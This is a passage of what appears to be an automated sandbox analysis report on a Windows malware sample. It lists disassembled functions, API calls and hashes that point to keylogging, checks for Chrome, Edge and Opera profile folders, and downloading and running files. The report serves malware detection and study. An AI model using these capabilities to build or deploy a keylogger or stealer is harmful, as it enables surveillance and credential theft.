                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                • GetLastError.KERNEL32 ref: 0044B804
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                • GetLastError.KERNEL32 ref: 0044B716
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: PkGNG
                                • API String ID: 442123175-263838557
                                • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/png
                                • API String ID: 1291196975-2966254431
                                • Opcode ID: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                • Opcode Fuzzy Hash: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                • Opcode ID: a90b17389d552f859138a2ff04c1bfca78c07f5b9cdbef66eb6a080414a1bef4
                                • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                • Opcode Fuzzy Hash: a90b17389d552f859138a2ff04c1bfca78c07f5b9cdbef66eb6a080414a1bef4
                                • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                • Opcode Fuzzy Hash: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044378C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction ID: ffc8389238c956ab6c1ca4f2b01b58cd1871601a5e35f3520dab429f03a8b914
                                • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction Fuzzy Hash: 7DE0E592A0182014F6717A3F6C0575B0545CBC2B7FF11833BF538861C1CFAC4A46519E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: d709a8515617d2ba673b64f2c8ca347ecdfd9c2513b907f156fef7f1ca1e605e
                                • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                • Opcode Fuzzy Hash: d709a8515617d2ba673b64f2c8ca347ecdfd9c2513b907f156fef7f1ca1e605e
                                • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: b1940e908fbd14d97542ecab4e0f5363c75517eb77e1add574f14eb0b46c354c
                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                • Opcode Fuzzy Hash: b1940e908fbd14d97542ecab4e0f5363c75517eb77e1add574f14eb0b46c354c
                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: d275befd3fa61f8c1a69313b9e352693d74fa3e6e400107db78181a14dff6bc9
                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                • Opcode Fuzzy Hash: d275befd3fa61f8c1a69313b9e352693d74fa3e6e400107db78181a14dff6bc9
                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004437E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                • Opcode ID: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                • Opcode Fuzzy Hash: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileSystem
                                • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                • API String ID: 2086374402-949981407
                                • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                • Opcode ID: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                • Opcode Fuzzy Hash: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___initconout.LIBCMT ref: 0045555B
                                  • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConsoleCreateFileWrite___initconout
                                • String ID: PkGNG
                                • API String ID: 3087715906-263838557
                                • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
